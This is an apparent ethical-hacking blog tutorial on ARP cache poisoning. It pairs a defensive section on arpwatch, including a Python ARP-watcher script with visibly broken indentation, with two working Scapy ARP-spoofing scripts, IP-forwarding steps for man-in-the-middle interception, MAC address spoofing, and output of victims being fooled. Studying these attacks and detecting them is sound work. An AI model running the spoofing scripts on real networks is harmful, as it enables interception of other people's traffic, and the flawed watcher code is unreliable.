ARP Poisoning is a protocol that associates a given IP Address with the Link Layer address of the relevant physical machine. Since IPv4 is still the most commonly used internet protocol. ARP generally bridges the gap between 32 bit IPv4 address and 48 bit mac addresses. It works in both direction. ARP Poisoning Attack to defend

ARP is a stateless protocol that is used within a broadcast domain to ensure the communication by resolving the IP address to MAC address maping. The relationship between a given MAC address and its IP address in kept in  a table known as the ARP cache. ARP protocol ensure the binding of IP address and mac address. By borad casting the ARP request with IP addresses, the switch can learn the associated MAC Address information form the reply of the specific host.

In the event that there is a no map or the map is unknown, the source will send a  broadcast to all nodes just the node with a coordinating MAC address for that IP will answer to the demand with the packet that involves the MAC address mapping. The switch will learn the MAC address and its connected port information into its fixed length CAM table.

As shown in the figure, the source generates the ARP query by broadcasting the ARP packet, A node  having the MAC address, the query is destined for will reply only to the packet. The frames  is floaded out all ports (other than the port on which the frame was received). If CAM table entries are full this also happen when the destination MAC Address in the frame is the broadcast address. MAC flooding technique is used to turn a switch into a hub in which switch starts broadcasting each and every packet. In the scenario,  each user can catch the packet even those packets which is not intende.

ARP Code Poisoning

Defend ARP Poisoning Attack

Disclaimer

 

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

My dear Linux lovers, how are you all remember us, you were reading about cache poisoning, if you don't remember then it doesn't matter. But do not take tension, after this this blog will not let you forget, yet you bookmark our website, it is your benefit, so now come back to your on our topic.

So, first of all lets know about ARP cache poisoning, The functionality of the protocol ARP (Address Resolution Protocol) was described in our another Post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html) . A computer that wants to send an IP packet to another host must beforehand request the mac address of the destination by using the ARP protocol. This question gets broadcasted to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker may send its victim every few seconds such an ARP reply packet but with its own MAC address as response and thus redirect the connection to itself.
 

For More info about ARP cache poisoning attack via practical too - CLICK HERE

To defend ARP poisoning attacks one could on one side use static ARP entries, but those could get overwritten by received ARP responses depending on the ARP handling code of the operating system on the other side one could use a tool such as ARP watcher).  

ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the
functionality of your IDS by using the above scripts to see how it behaves.

So, There are two methods when we talk about arp watching, the first one is code your own arp watcher and the second thing is used inbuilt tool. Choice is yours but both are same functionality and purpose.

First we choose a inbuilt tool then we work on code your own arpwatching.

Arpwatch

Arpwatch is an opensouce computer software program that helps you to monitor Ethernet traffic activity (like changing IP and MAC Addresses) on your network and maintains a database of ethernet/wlan0/Ip address pairings. It produces a log of noticed pairing of IP and mac addresses information along with a timestamps. This tool is specially useful for Network administrators to keep a watch on ARP activity to detect ARP spoofing or unexpected IP/MAC addresses modifications.

Let's Install

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
└─$ sudo apt-get install arpwatch               
[sudo] password for hackerboy: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following NEW packages will be installed:
  arpwatch
0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
Need to get 49.0 kB of archives.
After this operation, 161 kB of additional disk space will be used.
Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 arpwatch amd64 2.1a15-8 [49.0 kB]
Fetched 49.0 kB in 16s (3,125 B/s)  
Selecting previously unselected package arpwatch.
(Reading database ... 407952 files and directories currently installed.)
Preparing to unpack .../arpwatch_2.1a15-8_amd64.deb ...
Unpacking arpwatch (2.1a15-8) ...
Setting up arpwatch (2.1a15-8) ...
update-rc.d: We have no instructions for the arpwatch init script.
update-rc.d: It looks like a network service, we disable it.
arpwatch.service is a disabled or a static unit, not starting it.
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.4.2) ...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
└─$ 

Arpwatch configuration description

Arpwatch on systmed based linux systems does not support a configuration file, but the systemd unit files shipped with Debian allow to launch arpwatch with different configurations on each interface.

In order to do that, create a file called IFNAME.iface which contains variable assignments in sh syntax (comments are allowed). You can use the following variables to influence the invocation for that specific interface only:


# ARGS: overwrite the ARGS from /etc/default/arpwatch
# PCAP_FILTER: overwrite (or set) the pcap filter
# IFACE_ARGS: additional options to be passed to arpwatch 

                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ cat /etc/default/arpwatch
# Global options for arpwatch(8).

# do not use the -i, -f or -u options here, they are added automatically
# Debian: don't report bogons, don't use PROMISC.
ARGS="-N -p"

# if you want to add a pcap filter, uncomment and adjust the option below (you
# will need spaces so adding -F to the ARGS above will cause problems). See -F
# option in man 8 arpwatch for more information
#PCAP_FILTER="not ether host (00:11:22:33:44:55 or 66:77:88:99:aa:bb)"

# Debian: run as `arpwatch' user.  Empty this to run as root.
RUNAS="arpwatch"

# when using systemd you have to enable arpwatch explicitly for each interface
# you want to run it on by running:
# systemctl enable arpwatch@IFACE
# systemctl start arpwatch@IFACE

# For the LSB init script, enter a list of interfaces into the list below;
# arpwatch will be started to listen on these interfaces.
# Note: This is ignored when using systemd!
# INTERFACES="eth0 eth1"
INTERFACES=""
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

I have multiple ethernet interfaces on my debian server and I need run arpwatch on wlan0 interface:

      

                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ ifconfig                                                                                                                                                                          130 ⨯
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 688  bytes 61882 (60.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 688  bytes 61882 (60.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.249.25  netmask 255.255.255.0  broadcast 192.168.249.255
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        inet6 2409:4064:200b:220c:7ad5:600b:2ea3:7963  prefixlen 64  scopeid 0x0<global>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 53817  bytes 30589399 (29.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 62412  bytes 47543548 (45.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

In addition, on the enp5s0 interfaces I need to monitor changes in mac addresses not only for the 192.168.12.0/24 local network, but also for networks 192.168.122.0/24, 192.168.80/24 and 192.168.125.0/24. Changes in mac addresses I need log to file and also mail to email arpwatch@mydomain.com.

Arpwatch configuration

Go to /etc/arpwatch directory and create file wlan0.iface (IFNAME.iface) with this content:

┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo nano wlan0.iface  
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ cat wlan0.iface           
INTERFACES="wlan0"
ARGS="-N -p"
IFACE_ARGS="-m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24"
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

Here is man page for arpwatch: https://manpages.debian.org/unstable/arpwatch/arpwatch.8.en.html


# The -m option is used to specify the e-mail address to which reports will be sent. By default, reports are sent to root on the local machine.

# The -n flag specifies additional local networks. This can be useful to avoid bogon warnings when there is more than one network running on the same wire. If the optional width/mask is not specified, the default netmask for the network's class is used.

# The -N flag disables reporting any bogons.

# The -p flag disables promiscuous operation. ARP broadcasts get through hubs without having the interface in promiscuous mode, while saving considerable resources that would be wasted on processing gigabytes of non-broadcast traffic. Setting promiscuous mode does not mean getting 100% traffic that would concern arpwatch.

Arpwatch and systemd

Now you can start your arpwatch on wlan0 interface with systemctl start command:

  
  
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl daemon-reload
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl start arpwatch@wlan0 
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

  

You can check arpwatch daemon

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo systemctl status arpwatch@wlan0                                                                                                                                                2 ⚙
● arpwatch@wlan0.service - arpwatch service on interface wlan0
     Loaded: loaded (/lib/systemd/system/arpwatch@.service; enabled; vendor preset: disabled)
     Active: active (running) since Tue 2022-01-25 18:10:08 IST; 28min ago
       Docs: man:arpwatch(8)
   Main PID: 26295 (arpwatch)
      Tasks: 1 (limit: 4366)
     Memory: 3.1M
        CPU: 745ms
     CGroup: /system.slice/system-arpwatch.slice/arpwatch@wlan0.service
             └─26295 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 212.158.133.0/24 -F ""

Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Stopped arpwatch service on interface wlan0.
Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: arpwatch@wlan0.service: Consumed 2.360s CPU time.
Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Starting arpwatch service on interface wlan0...
Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Started arpwatch service on interface wlan0.
Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: Running as uid=140 gid=149
Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: listening on wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.45 08:00:27:67:67:30 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$    

new activity – This ethernet/ip address pair has been used for the first time six months or more.

new station – The ethernet address has not been seen before.

flip flop – The ethernet address has changed from the most recently seen address to the second most recently seen address. If either the old or new ethernet address is a DECnet address and it is less than 24 hours, the email version of the report is suppressed.

changed ethernet address – The host switched to a new ethernet address.

check that arpwatch run

┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ ps aux|grep arp
hackerb+    4312  0.1  0.4 545140 18244 ?        Sl   08:38   0:03 leafpad /home/hackerboy/Desktop/Penetration-tester-jr/arpcache/arpwatch/arpwatch-content.txt
root        6365  0.0  0.0  11140  3212 pts/1    S+   08:46   0:00 sudo python3 arpcache.py 192.168.122.45 192.168.122.30
root        6376  0.1  2.0 129852 76892 pts/1    S+   08:46   0:03 python3 arpcache.py 192.168.122.45 192.168.122.30
arpwatch   14690  0.0  0.1  13680  6700 ?        S    09:15   0:00 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24 -F
hackerb+   19812  0.0  0.0   6316  2260 pts/3    S+   09:35   0:00 grep --color=auto arp
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ 

arpwatch after reboot

You have to enable arpwatch@wlan0 service unit to start after system reboot:

┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl daemon-reload                                                                                                                                                        1 ⚙
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl enable arpwatch@wlan0                                                                                                                                                1 ⚙
Created symlink /etc/systemd/system/multi-user.target.wants/arpwatch@wlan0.service → /lib/systemd/system/arpwatch@.service.
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$      

Create /var/log/arpwatch directory and file arpwatch.log in this directory:

                                                                                                                                                                                 
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo mkdir /var/log/arpwatch                                                                                                                                                    1 ⨯ 1 ⚙
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo touch /var/log/arpwatch/arpwatch.log                                                                                                                                           1 ⚙
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo chmod 666 /var/log/arpwatch/arpwatch.log                                                                                                                                       1 ⚙

And restart rsyslog daemon:

                                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$ sudo systemctl restart rsyslog                                                                                                                                                127 ⨯ 1 ⚙
                                                                                                                                                                                            
┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
└─$           


┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
└─$ sudo systemctl status rsyslog                                                                                                                                                       1 ⚙
● rsyslog.service - System Logging Service
     Loaded: loaded (/lib/systemd/system/rsyslog.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2022-01-24 09:51:27 IST; 4min 30s ago
TriggeredBy: ● syslog.socket
       Docs: man:rsyslogd(8)
             man:rsyslog.conf(5)
             https://www.rsyslog.com/doc/
   Main PID: 23919 (rsyslogd)
      Tasks: 4 (limit: 4366)
     Memory: 1.6M
        CPU: 173ms
     CGroup: /system.slice/rsyslog.service
             └─23919 /usr/sbin/rsyslogd -n -iNONE

Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Starting System Logging Service...
Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Started System Logging Service.
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd.  [v8.2110.0]
Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: [origin software="rsyslogd" swVersion="8.2110.0" x-pid="23919" x-info="https://www.rsyslog.com"] start
┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
└─$           

And now you can see messges from working arpwatch daemon:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$                                                                                                                                                                               130 ⨯ 2 ⚙
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ cat /var/log/arpwatch/arpwatch.log   
                                                                                                                                         
Jan 25 18:10:07 KumarAtulJaiswal arpwatch: exiting
Jan 25 18:10:08 KumarAtulJaiswal arpwatch: Running as uid=140 gid=149
Jan 25 18:10:08 KumarAtulJaiswal arpwatch: listening on wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch: new station 192.168.249.45 08:00:27:67:67:30 wlan0
Jan 25 18:34:18 KumarAtulJaiswal arpwatch: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0

arpwatch mac addresses files 

Default directory for arpwatch mac addresses databes is /var/lib/arpwatch. File is in IFNAME.dat format. You can print databese content:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ cat /var/lib/arpwatch/wlan0.dat                                                                                                                                                 1 ⨯ 2 ⚙
fc:01:7c:29:00:77       192.168.122.30  1643114422              wlan0
fc:01:7c:29:00:77       192.168.122.25  1643045197              wlan0
e6:e4:e4:95:1e:27       192.168.122.158 1643045197              wlan0
e6:e4:e4:95:1e:27       192.168.249.79  1643119787              wlan0
fc:01:7c:29:00:77       192.168.249.25  1643119770              wlan0
fc:01:7c:29:00:77       192.168.249.45  1643119787              wlan0
08:00:27:67:67:30       192.168.249.45  1643119391              wlan0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$      

NOTE- When you run arpwatch daemon for first time, databese file is empty. You have to restart arpwatch daemon first to see any content. 

Arp-watcher 

Now this time we code own arp-watcher.

#!/usr/bin/python
from scapy.all import sniff, ARP
from signal import signal, SIGINT
import sys
arp_watcher_db_file = "/var/cache/arp-watcher.db"
ip_mac = {}
# Save ARP table on shutdown


def sig_int_handler(signum, frame):
    print "Got SIGINT. Saving ARP database..."
    try:
        f = open(arp_watcher_db_file, "w")
        for (ip, mac) in ip_mac.items():
            f.write(ip + " " + mac + "\n")
            f.close()
            print "Done."
    except IOError:
        print "Cannot write file " + arp_watcher_db_file
        sys.exit(1)


def watch_arp(pkt):
    # got is-at pkt (ARP response)
    if pkt[ARP].op == 2:
        print pkt[ARP].hwsrc + " " + pkt[ARP].psrc
        # Device is new. Remember it.
        if ip_mac.get(pkt[ARP].psrc) == None:
            print "Found new device " + pkt[ARP].hwsrc + " " + pkt[ARP].psrc
            ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
            # Device is known but has a different IP
        elif ip_mac.get(pkt[ARP].psrc) and ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
            print pkt[ARP].hwsrc + " has got new ip " + pkt[ARP].psrc + " (old " + ip_mac[pkt[ARP].psrc] + ")"
            ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
            signal(SIGINT, sig_int_handler)


if len(sys.argv) < 2:
    print sys.argv[0] + " <iface>"
    sys.exit(0)
    try:
        fh = open(arp_watcher_db_file, "r")
    except IOError:
        print "Cannot read file " + arp_watcher_db_file
        sys.exit(1)
        for line in fh:
            line.chomp()
            (ip, mac) = line.split(" ")
            ip_mac[ip] = mac
            sniff(prn=watch_arp,
                  filter="arp",
                  iface=sys.argv[1],
                  store=0)

python arpwatch.py iface

python arpwatch.py wlan0

At the start we define a signal handler in sig_int_handler() that gets called if the user interrupts the program. This function will save all known IP to MAC resolutions in the ip_mac dictionary to a file. Afterwards we read those ARP db file to initialize the program with all currently known resolutions or exit if the file cannot be read. Than we loop line by line through the files content and split each line into IP and MAC to save them in the ip_mac dictionary. Now we call the already known function sniff() that will invoke the callback function
watch_arp for every received ARP packet.


The function watch_arp implements the real logic of the program. When the sniffed packet is a is-at packet and therefore an ARP response than we first check if the IP exists in the ip_mac dictionary. If we didn’t find an entry the device is new and shows a message to the screen, otherwise we compare the MAC address with the MAC in our dictionary. If it differs the response is probably forged and we print a message to the screen. In both cases the dictionary gets updated with the new information.

Disclaimer

ARP-Cache-Poisoning

The functionality of the protocol ARP (Address Resolution Protocol) was described in our another Post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html) . A computer that wants to send an IP packet to another host must beforehand request the mac address of the destination by using the ARP protocol. This question gets broadcasted to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker may send its victim every few seconds such an ARP reply packet but with its own MAC address as response and thus redirect the connection to itself.


This works because most operating systems accept response packets to questions they never asked!
 

Lets write the code in python networking -

#!/usr/bin/python

import sys
import time
from scapy.all import sendp, ARP, Ether

if len(sys.argv) < 3:
    print(sys.argv[0] + ": <target> <spoof_ip>")  #victim ip and Fake IP, sudo python3 arpcache.py 192.168.122.45 192.168.122.30 
    sys.exit(1)

iface = "wlan0"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

widelan = Ether()              #before widelan/ether (www.kumaratuljaiswal.in)
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")

packet = widelan / arp

while True:
    sendp(packet, iface=iface)
    time.sleep(10)
    

With the help of Scapy we construct a packet called packet consisting of an Ethernet() and an ARP() header. In the ARP header we set the IP address of the victim (target_ip) and the IP which we would like to hijack all connections (fake_ip). As last parameter we define the OP-Code is-at, that declares the packet as an ARP response. Afterwards the function sendp() sends the packet in an endless loop waiting 10 s between each delivery. Its important to note that you have to call the function sendp() and not the function send(), because the packet should be sent on layer 2. The function send() sends packets on layer 3.

Additional Detail- Let's read

For short refreshing:

Ethernet is on Layer 2, IP (Internet Protocol) on Layer 3, TCP (Transport Control Protocol) or UDP on Layer 4–6 and services like HTTP, SMTP,
FTP on Layer 7.

NOTE - One last thing to remember is to enable IP forwarding otherwise your host would block the connection of the victim.

IP Forwarding

Why we need to use IP Forwarding in scapy (arpcache). Dont worry if you don't know let see If the Linux server is acting as a firewall, router, or NAT device, it will need to be capable of forwarding packets that are meant for other destinations (other than itself).

Conversely, IP forwarding should usually be turned off if you’re not using one of the aforementioned configurations. You typically don’t want your system wasting bandwidth or resources to forward packets elsewhere, unless it’s been designed to do that job.

Check current IP forwarding status

Most systems will be able to use the sysctl command, which can apply kernel variables. Therefore, you can use the following sysctl command to check whether IP forwarding is enabled or disabled.

# sysctl net.ipv4.ip_forward
net.ipv4.ip_forward = 0

In the example above, the net.ipv4.ip_forward kernel setting is 0. That means it’s off. If it were set to 1, that would mean it’s enabled.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ sysctl net.ipv4.ip_forward       
net.ipv4.ip_forward = 0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 

You can also check via this command cat /proc/sys/net/ipv4/ip_forward on file system enable or not!.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ cat /proc/sys/net/ipv4/ip_forward
0
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 

Enable or disable IP forwarding

You can use the following sysctl command to enable or disable Linux IP forwarding on your system.

# sysctl -w net.ipv4.ip_forward=0
OR
# sysctl -w net.ipv4.ip_forward=1

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ sudo sysctl net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 

Again we check ip forwarding setting whether it is enabled or not!!!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ sysctl net.ipv4.ip_forward       
net.ipv4.ip_forward = 1
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
└─$ 

Don’t forget to check the settings of your packet filter like IPtables, pf or ipfw or just disable it, but now enough about the boring theory lets jump into some practical Python code!

If you only manipulate the ARP cache of the client with the fake_ip you only get the packets of the client, but the responses of the server will stay invisible.

To enforce a bidirectional connection through the computer of the attacker like in above the attacker has to forge both the client and the server with his own MAC for the relevant destination. Our first code is a bit graceless and sends a lot of ARP packets. It doesn’t only
generate more traffic as needed it’s also conspicuous. Stealthy attackers would use another tactic. A computer that wants to get knowledge about an IP address asks with an ARP
request.




Additional Details-

What is Stealth ?

Stealth scan or Half-open scan is one of the scanning methods in Nmap in which the intruder uses to bypass the firewall and authentication mechanisms. Also, by using this method, they make the scan operation as normal network traffic and thus the scan is hidden.



We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request. In a switched environment this will result in every connection flowing over the computer of the attacker, because in every ARP cache there will be the attackers MAC for every IP address. This solution is more elegant and not as noisy as the one before, but still quite easy to detected for a trained admin. The spoofed response packet gets sent in parallel to the response of the real host as illustrated in Fig a.png . The computer whose packet receives first at the victims network card wins.

MAC Address change

Every network card in an Ethernet network has a MAC address that’s world-wide unique and are used to address devices on the net. The MAC address consists of six two digit hexadecimal numbers, which are separated by colons (e.g. aa:bb:cc:11:22:33).

Its a common misbelief that a computer in a local TCP/IP network is reached over its IP address; in reality the MAC address is used for this purpose. Another common misunderstanding is that the MAC address cannot be spoofed. The operating system is responsible to write the MAC into the Ethernet header and systems like GNU/Linux or *BSD have possibilities in their base system to change the MAC with one command.

Also read - https://www.kumaratuljaiswal.in/2020/04/how-to-change-mac-address-with-mac.html

Changing MAC address Command -

Before/n/After

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ sudo ifconfig eth0 hw ether c0:de:de:ad:be:e

[sudo] password for hackerboy: 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ ifconfig                                    
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether c0:de:de:ad:be:0e  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
└─$ 

We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request.

import sys
import time
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) > 2:
    print(sys.argv[0] + " <iface>")
    sys.exit(0)


def arp_poison_callback (packet):
    #Got ARP request
    if packet[ARP].op == 1:
        answer = Ether(dst=packet[ARP].hwsrc) / ARP()
        answer[ARP].op = "is-at"
        answer[ARP].hwdst = packet[ARP].hwsrc
        answer[ARP].psrc = packet[ARP].pdst
        answer[ARP].pdst = packet[ARP].psrc

        print("Fooling " + packet[ARP].psrc + " that " + packet[ARP].pdst + " is me")
        sendp(answer, iface=sys.argv[1])


sniff(prn=arp_poison_callback,
      filter="arp",
      iface=sys.argv[1],
      store=0)

The function sniff() reads packets in an endless loop from the interface specified by the parameter iface. The received packets are automatically filtered by the PCAP filter arp that guarantees that our callback function arp_poison_callback will only get called with ARP packets as input. Due to the parameter store=0 the packet will only be saved in memory but not on the hard disk. The function arp_poison_callback() handles the real work of our program.

First of all it checks the OP code of the ARP packet: when it’s 1 the packet is an ARP request and we generate a response packet, that has the source MAC and IP of the request packet as destination MAC and IP. We don’t define a source MAC thus Scapy automatically insert the addresses of the sending network interface.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$                                                                                                                                                                                     
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 arpcache-2.py wlan0 
Fooling 192.168.122.45 that 192.168.122.158 is me
.
Sent 1 packets.
Fooling 192.168.122.158 that 192.168.122.25 is me
.
Sent 1 packets.
Fooling 192.168.122.45 that 192.168.122.158 is me
.
Sent 1 packets.
Fooling 192.168.122.45 that 192.168.122.158 is me
.
Sent 1 packets.
Fooling 192.168.122.158 that 192.168.122.25 is me
.
Sent 1 packets.
Fooling 192.168.122.45 that 192.168.122.158 is me
.
Sent 1 packets.
^C                                                                                                                                                                                          ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$    

The IP to MAC resolution of ARP will get cached for some time, because it would be dump to ask for the resolution of the same address over and over again. This ARP cache can be displayed with the following command.



arp -an



It depends on the operating system, its version and local configuration settings on how long addresses will get cached.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ arp -an                                                                                                                                                                       148 ⨯ 3 ⚙
